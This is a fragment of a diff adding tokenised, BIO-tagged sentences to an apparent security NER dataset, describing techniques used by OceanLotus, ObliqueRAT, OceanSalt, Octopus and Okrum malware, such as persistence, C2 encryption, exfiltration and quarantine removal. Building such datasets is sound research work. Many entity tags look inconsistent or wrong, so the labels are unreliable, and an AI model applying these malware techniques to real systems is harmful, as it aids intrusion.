"scrambles", + "and", + "encrypts", + "data", + "using", + "AES256", + "before", + "sending", + "it", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Features", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OSX_OCEANLOTUS.D", + "has", + "the", + "ability", + "to", + "upload", + "files", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OSX_OCEANLOTUS.D", + "uses", + "a", + "decode", + "routine", + "combining", + "bit", + "shifting", + "and", + "XOR", + "operations", + "with", + "a", + "variable", + "key", + "that", + "depends", + "on", + "the", + "length", + "of", + "the", + "string", + "that", + "was", + "encoded.", + "If", + "the", + "computation", + "for", + "the", + "variable", + "XOR", + "key", + "turns", + "out", + "to", + "be", + "0,", + "the", + "default", + "XOR", + "key", + "of", + "0x1B", + "is", + "used.", + "This", + "routine", + "is", + "also", + "referenced", + "as", + "the", + "`rotate`", + "function", + "in", + "reporting." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "O", + "I-Features", + "I-Features", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OSX_OCEANLOTUS.D", + "encrypts", + "its", + "strings", + "in", + "RSA256", + "and", + "encodes", + "them", + "in", + "a", + "custom", + "base64", + "scheme", + "and", + "XOR." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OSX_OCEANLOTUS.D", + "has", + "a", + "command", + "to", + "delete", + "a", + "file", + "from", + "the", + "system.", + "OSX_OCEANLOTUS.D", + "deletes", + "the", + "app", + "bundle", + "and", + "dropper", + "after", + "execution." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OSX_OCEANLOTUS.D", + "uses", + "the", + "command", + "<code>xattr", + "-d", + "com.apple.quarantine</code>", + "to", + "remove", + "the", + "quarantine", + "file", + "attribute", + "used", + "by", + "Gatekeeper." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus" + ] + }, + { + "tokens": [ + "OSX_OCEANLOTUS.D", + "sets", + "the", + "main", + "loader", + "file’s", + "attributes", + "to", + "hidden." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OSX_OCEANLOTUS.D", + "has", + "a", + "command", + "to", + "download", + "and", + "execute", + "a", + "file", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OSX_OCEANLOTUS.D", + "can", + "create", + "a", + "persistence", + "file", + "in", + "the", + "folder", + "<code>/Library/LaunchAgents</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "If", + "running", + "with", + "<code>root</code>", + "permissions,", + "OSX_OCEANLOTUS.D", + "can", + "create", + "a", + "persistence", + "file", + "in", + "the", + "folder", + "<code>/Library/LaunchDaemons</code>." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OSX_OCEANLOTUS.D", + "has", + "changed", + "permissions", + "of", + "a", + "second-stage", + "payload", + "to", + "an", + "executable", + "via", + "<code>chmod</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OSX_OCEANLOTUS.D", + "has", + "disguised", + "it's", + "true", + "file", + "structure", + "as", + "an", + "application", + "bundle", + "by", + "adding", + "special", + "characters", + "to", + "the", + "filename", + "and", + "using", + "the", + "icon", + "for", + "legitimate", + "Word", + "documents." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-SamFile", + "O" + ] + }, + { + "tokens": [ + "OSX_OCEANLOTUS.D", + "uses", + "file", + "naming", + "conventions", + "with", + "associated", + "executable", + "locations", + "to", + "blend", + "in", + "with", + "the", + "macOS", + "TimeMachine", + "and", + "OpenSSL", + "services.", + "Such", + "as,", + "naming", + "a", + "LaunchAgent", + "plist", + "file", + "`com.apple.openssl.plist`", + "which", + "executes", + "OSX_OCEANLOTUS.D", + "from", + "the", + "user's", + "`~/Library/OpenSSL/`", + "folder", + "upon", + "user", + "login." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SecTeam", + "O", + "B-SamFile", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OSX_OCEANLOTUS.D", + "has", + "used", + "a", + "custom", + "binary", + "protocol", + "over", + "port", + "443", + "for", + "C2", + "traffic." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OSX_OCEANLOTUS.D", + "has", + "used", + "a", + "custom", + "binary", + "protocol", + "over", + "TCP", + "port", + "443", + "for", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OSX_OCEANLOTUS.D", + "uses", + "PowerShell", + "scripts." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "For", + "network", + "communications,", + "OSX_OCEANLOTUS.D", + "loads", + "a", + "dynamic", + "library", + "(`.dylib`", + "file)", + "using", + "`dlopen()`", + "and", + "obtains", + "a", + "function", + "pointer", + "to", + "execute", + "within", + "that", + "shared", + "library", + "using", + "`dlsym()`." + ], + "ner_tags": [ + "O", + "I-Idus", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OSX_OCEANLOTUS.D", + "has", + "a", + "variant", + "that", + "is", + "packed", + "with", + "UPX." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg" + ] + }, + { + "tokens": [ + "OSX_OCEANLOTUS.D", + "has", + "used", + "`zlib`", + "to", + "compress", + "all", + "data", + "after", + "0x52", + "for", + "the", + "custom", + "TCP", + "C2", + "protocol." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "OSX_OCEANLOTUS.D", + "encrypts", + "data", + "sent", + "back", + "to", + "the", + "C2", + "using", + "AES", + "in", + "CBC", + "mode", + "with", + "a", + "null", + "initialization", + "vector", + "(IV)", + "and", + "a", + "key", + "sent", + "from", + "the", + "server", + "that", + "is", + "padded", + "to", + "32", + "bytes." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OSX_OCEANLOTUS.D", + "checks", + "a", + "number", + "of", + "system", + "parameters", + "to", + "see", + "if", + "it", + "is", + "being", + "run", + "on", + "real", + "hardware", + "or", + "in", + "a", + "virtual", + "machine", + "environment,", + "such", + "as", + "`sysctl", + "hw.model`", + "and", + "the", + "kernel", + "boot", + "time." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OSX_OCEANLOTUS.D", + "collects", + "processor", + "information,", + "memory", + "information,", + "computer", + "name,", + "hardware", + "UUID,", + "serial", + "number,", + "and", + "operating", + "system", + "version.", + "OSX_OCEANLOTUS.D", + "has", + "used", + "the", + "<code>ioreg</code>", + "command", + "to", + "gather", + "some", + "of", + "this", + "information." + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "OSX_OCEANLOTUS.D", + "can", + "collect", + "the", + "network", + "interface", + "MAC", + "address", + "on", + "the", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OSX_OCEANLOTUS.D", + "can", + "use", + "the", + "<code>touch", + "-t</code>", + "command", + "to", + "change", + "timestamps." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OSX_OCEANLOTUS.D", + "uses", + "a", + "shell", + "script", + "as", + "the", + "main", + "executable", + "inside", + "an", + "app", + "bundle", + "and", + "drops", + "an", + "embedded", + "base64-encoded", + "payload", + "to", + "the", + "<code>/tmp</code>", + "folder." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "OSX_OCEANLOTUS.D", + "uses", + "Word", + "macros", + "for", + "execution." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Tool", + "I-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "OSX_OCEANLOTUS.D", + "can", + "also", + "use", + "use", + "HTTP", + "POST", + "and", + "GET", + "requests", + "to", + "send", + "and", + "receive", + "C2", + "information." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-HackOrg", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ObliqueRAT", + "can", + "break", + "large", + "files", + "of", + "interest", + "into", + "smaller", + "chunks", + "to", + "prepare", + "them", + "for", + "exfiltration." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ObliqueRAT", + "has", + "the", + "ability", + "to", + "extract", + "data", + "from", + "removable", + "devices", + "connected", + "to", + "the", + "endpoint." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ObliqueRAT", + "has", + "the", + "ability", + "to", + "recursively", + "enumerate", + "files", + "on", + "an", + "infected", + "endpoint." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ObliqueRAT", + "can", + "copy", + "specific", + "files,", + "webcam", + "captures,", + "and", + "screenshots", + "to", + "local", + "directories." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "B-Features", + "O", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ObliqueRAT", + "has", + "gained", + "execution", + "on", + "targeted", + "systems", + "through", + "luring", + "users", + "to", + "click", + "on", + "links", + "to", + "malicious", + "URLs." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ObliqueRAT", + "can", + "discover", + "pluggable/removable", + "drives", + "to", + "extract", + "files", + "from." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "ObliqueRAT", + "can", + "check", + "for", + "blocklisted", + "process", + "names", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ObliqueRAT", + "can", + "gain", + "persistence", + "by", + "a", + "creating", + "a", + "shortcut", + "in", + "the", + "infected", + "user's", + "Startup", + "directory." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ObliqueRAT", + "can", + "capture", + "a", + "screenshot", + "of", + "the", + "current", + "screen." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ObliqueRAT", + "can", + "hide", + "its", + "payload", + "in", + "BMP", + "images", + "hosted", + "on", + "compromised", + "websites." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ObliqueRAT", + "can", + "halt", + "execution", + "if", + "it", + "identifies", + "processes", + "belonging", + "to", + "virtual", + "machine", + "software", + "or", + "analysis", + "tools." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ObliqueRAT", + "has", + "the", + "ability", + "to", + "check", + "for", + "blocklisted", + "computer", + "names", + "on", + "infected", + "endpoints." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ObliqueRAT", + "can", + "check", + "for", + "blocklisted", + "usernames", + "on", + "infected", + "endpoints." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ObliqueRAT", + "can", + "capture", + "images", + "from", + "webcams", + "on", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OceanSalt", + "can", + "delete", + "files", + "from", + "the", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OceanSalt", + "can", + "extract", + "drive", + "information", + "from", + "the", + "endpoint", + "and", + "search", + "files", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OceanSalt", + "can", + "encode", + "data", + "with", + "a", + "NOT", + "operation", + "before", + "sending", + "the", + "data", + "to", + "the", + "control", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OceanSalt", + "can", + "collect", + "the", + "name", + "and", + "ID", + "for", + "every", + "process", + "running", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OceanSalt", + "has", + "been", + "delivered", + "via", + "spearphishing", + "emails", + "with", + "Microsoft", + "Office", + "attachments." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OceanSalt", + "can", + "collect", + "the", + "computer", + "name", + "from", + "the", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OceanSalt", + "can", + "collect", + "the", + "victim’s", + "IP", + "address." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OceanSalt", + "can", + "create", + "a", + "reverse", + "shell", + "on", + "the", + "infected", + "endpoint", + "using", + "cmd.exe.", + "OceanSalt", + "has", + "been", + "executed", + "via", + "malicious", + "macros." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Octopus", + "has", + "compressed", + "data", + "before", + "exfiltrating", + "it", + "using", + "a", + "tool", + "called", + "Abbrevia." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Octopus", + "can", + "exfiltrate", + "files", + "from", + "the", + "system", + "using", + "a", + "documents", + "collector", + "tool." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "Octopus", + "has", + "uploaded", + "stolen", + "files", + "and", + "data", + "from", + "a", + "victim's", + "machine", + "over", + "its", + "C2", + "channel." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Octopus", + "has", + "exfiltrated", + "data", + "to", + "file", + "sharing", + "sites." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Octopus", + "can", + "collect", + "information", + "on", + "the", + "Windows", + "directory", + "and", + "searches", + "for", + "compressed", + "RAR", + "files", + "on", + "the", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Octopus", + "can", + "download", + "additional", + "files", + "and", + "tools", + "onto", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Octopus", + "has", + "stored", + "collected", + "information", + "in", + "the", + "Application", + "Data", + "directory", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Octopus", + "has", + "relied", + "upon", + "users", + "clicking", + "on", + "a", + "malicious", + "attachment", + "delivered", + "through", + "spearphishing." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Octopus", + "has", + "been", + "disguised", + "as", + "legitimate", + "programs,", + "such", + "as", + "Java", + "and", + "Telegram", + "Messenger." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "B-Tool" + ] + }, + { + "tokens": [ + "Octopus", + "achieved", + "persistence", + "by", + "placing", + "a", + "malicious", + "executable", + "in", + "the", + "startup", + "directory", + "and", + "has", + "added", + "the", + "<code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>", + "key", + "to", + "the", + "Registry." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Octopus", + "can", + "capture", + "screenshots", + "of", + "the", + "victims’", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Octopus", + "has", + "been", + "delivered", + "via", + "spearsphishing", + "emails." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Octopus", + "has", + "encoded", + "C2", + "communications", + "in", + "Base64." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Octopus", + "can", + "collect", + "system", + "drive", + "information,", + "the", + "computer", + "name,", + "the", + "size", + "of", + "the", + "disk,", + "OS", + "version,", + "and", + "OS", + "architecture", + "information." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Octopus", + "can", + "collect", + "the", + "host", + "IP", + "address", + "from", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Octopus", + "can", + "collect", + "the", + "username", + "from", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Octopus", + "has", + "used", + "HTTP", + "GET", + "and", + "POST", + "requests", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Octopus", + "has", + "used", + "wmic.exe", + "for", + "local", + "discovery", + "information." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Okrum", + "has", + "used", + "a", + "custom", + "implementation", + "of", + "AES", + "encryption", + "to", + "encrypt", + "collected", + "data." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Okrum", + "was", + "seen", + "using", + "a", + "RAR", + "archiver", + "tool", + "to", + "compress/decompress", + "data." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Okrum", + "was", + "seen", + "using", + "modified", + "Quarks", + "PwDump", + "to", + "perform", + "credential", + "dumping." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Okrum's", + "loader", + "can", + "decrypt", + "the", + "backdoor", + "code,", + "embedded", + "within", + "the", + "loader", + "or", + "within", + "a", + "legitimate", + "PNG", + "file.", + "A", + "custom", + "XOR", + "cipher", + "or", + "RC4", + "is", + "used", + "for", + "decryption." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Data", + "exfiltration", + "is", + "done", + "by", + "Okrum", + "using", + "the", + "already", + "opened", + "channel", + "with", + "the", + "C2", + "server." + ], + "ner_tags": [ + "O", + "B-Purp", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Okrum", + "can", + "identify", + "proxy", + "servers", + "configured", + "and", + "used", + "by", + "the", + "victim,", + "and", + "use", + "it", + "to", + "make", + "HTTP", + "requests", + "to", + "C2", + "its", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Okrum's", + "backdoor", + "deletes", + "files", + "after", + "they", + "have", + "been", + "successfully", + "uploaded", + "to", + "C2", + "servers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Okrum", + "has", + "used", + "DriveLetterView", + "to", + "enumerate", + "drive", + "information." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Before", + "exfiltration,", + "Okrum's", + "backdoor", + "has", + "used", + "hidden", + "files", + "to", + "store", + "logs", + "and", + "outputs", + "from", + "backdoor", + "commands." + ], + "ner_tags": [ + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Okrum", + "has", + "built-in", + "commands", + "for", + "uploading,", + "downloading,", + "and", + "executing", + "files", + "to", + "the", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Okrum", + "was", + "seen", + "using", + "a", + "keylogger", + "tool", + "to", + "capture", + "keystrokes." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "I-Features", + "B-Purp" + ] + }, + { + "tokens": [ + "Okrum", + "was", + "seen", + "using", + "MimikatzLite", + "to", + "perform", + "credential", + "dumping." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Okrum", + "can", + "establish", + "persistence", + "by", + "adding", + "a", + "new", + "service", + "NtmsSvc", + "with", + "the", + "display", + "name", + "Removable", + "Storage", + "to", + "masquerade", + "as", + "a", + "legitimate", + "Removable", + "Storage", + "Manager." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Okrum", + "mimics", + "HTTP", + "protocol", + "for", + "C2", + "communication,", + "while", + "hiding", + "the", + "actual", + "messages", + "in", + "the", + "Cookie", + "and", + "Set-Cookie", + "headers", + "of", + "the", + "HTTP", + "requests." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Okrum", + "establishes", + "persistence", + "by", + "creating", + "a", + ".lnk", + "shortcut", + "to", + "itself", + "in", + "the", + "Startup", + "folder." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Okrum's", + "installer", + "can", + "attempt", + "to", + "achieve", + "persistence", + "by", + "creating", + "a", + "scheduled", + "task." + ], + "ner_tags": [ + "B-Idus", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Okrum's", + "loader", + "can", + "create", + "a", + "new", + "service", + "named", + "NtmsSvc", + "to", + "execute", + "the", + "payload." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + 